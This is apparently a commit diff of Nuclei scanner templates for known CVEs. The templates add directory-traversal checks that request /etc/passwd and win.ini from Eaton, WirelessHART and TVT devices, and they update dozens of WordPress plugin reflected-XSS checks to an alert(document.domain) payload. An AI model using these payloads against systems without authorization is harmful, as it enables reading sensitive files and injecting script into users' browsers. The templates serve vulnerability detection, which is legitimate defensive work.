description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
|
||||
reference: |
|
||||
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
|
||||
- https://www.exploit-db.com/exploits/48614
|
||||
tags: cve,cve2018,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[0*]:0:0"
|
||||
- "\\[(font|extension|file)s\\]"
|
||||
condition: or
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2018-16059
|
||||
|
||||
info:
|
||||
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
|
||||
- https://www.exploit-db.com/exploits/45342
|
||||
tags: cve,cve2018,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/fcgi-bin/wgsetcgi"
|
||||
body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
|
||||
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -13,13 +13,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
|
||||
- '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=confirm(123)>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2019-16525
|
||||
|
||||
info:
|
||||
name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525
|
||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'foo"><svg//onload="alert(123)">'
|
||||
- 'foo"></script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2019-20085
|
||||
|
||||
info:
|
||||
name: TVT NVMS 1000 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
|
||||
- https://www.exploit-db.com/exploits/48311
|
||||
tags: cve,cve2019,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "\\[(font|extension|file)s\\]"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -18,7 +18,9 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=alert(123);>"
|
||||
- "catch-breadcrumb"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
|
@ -11,13 +11,18 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E'
|
||||
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img src onerror=alert(123)>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "nova-lite"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E'
|
||||
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E'
|
||||
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=(alert)(123);>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
|
||||
- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=alert(123);>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E'
|
||||
- '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>prompt(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert('{{randstr}}')</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E '
|
||||
- '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,16 +10,16 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -13,13 +13,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(1)</script>'
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
|
|
Loading…
Reference in New Issue